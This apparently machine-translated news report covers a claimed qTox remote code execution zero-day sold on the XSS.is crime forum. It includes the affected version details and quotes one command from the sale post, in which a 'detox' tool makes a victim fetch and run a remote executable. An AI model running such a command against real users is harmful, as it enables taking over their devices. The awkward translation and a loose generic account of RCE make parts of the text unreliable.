Remote code execution vulnerability allegedly exists in qTox, a popular chat app on the dark web, which sells for 20 BTC

"ODN" once scienced Tox, Tox is a free point-to-point instant messaging and video calling network protocol that enables encrypted data exchange. The goal of the project is to create a secure and easy-to-use communication platform. The combination of Tox and Tor can achieve completely anonymous point-to-point communication on the dark web. Among them, qTox is used more.

Recently, on the popular dark web crime forum XSS.is, the advanced user nightly (registered on April 10, 2019) announced the sale of vulnerabilities in the latest version (1.17.6) of the popular dark web chat software qTox for 20 BTC (US$529,500). The vulnerability is a remote code execution vulnerability.

To prove that qTox does have a remote code execution (RCE) zero-day vulnerability, the author uploaded and referenced a GIF image containing detailed information on accessing and executing operations. The image shows everyone that for the attacker, the user accepting the communication request sent to him is enough. 

nightly wrote: "All similar to that topic. In one hand, the guarantor can be at my expense, who has a dep - I'm throwing forward, transfer source code and help how to use after the purchase. Finish nothing I will not, because my head is boiling from this shit-code. This will be the task of your coder. "

According to the post, the vulnerability affects the following versions:

You are using qTox version v1.17.6.
toxcore version: 0.2.13
Commit hash: 54345d1085628950af4176e6b4873513db0de4f3
Qt version: 5.7.1

Some of the major players in the information security market reacted to this almost immediately. In particular, vx-underground wrote on their Telegram channel that the exploit "will allow attacks on virtually every ransomware gang and threat actor on the planet."

On the night of May 25-26, a follow up post appeared with the message that the vulnerability had been sold, with no buyer information provided.

Notably, the Remote Code Execution (RCE) vulnerability allows remote code injection into server scripts, which in all possible scenarios can lead to hacking of resources or applications. As a result, an attacker could quickly take control and access the victim's device.

According to the post, Run:

./detox "https://***.zip/test.exe"

Meanwhile, the ransomware group Lockbit announced that it was ending the use of Tox as a way to contact them, and in addition, XSS.is administrators removed the hash of the Tox communication method from their profile's messages.

Lockbit ransomware gang administrators said, "Now how do I make new friends? Don't send me messages on qTox, I only have old friends)))"

The XSS.is admin stated that the reason for removing his own tox was the many problems of their clients and the lack of updates, and he said, "I don't know much about this vulnerability, but it is related to qtox, not the core of tox, and he said that we are looking for alternative ways or the same." We will return tox and Telegram is definitely not an alternative.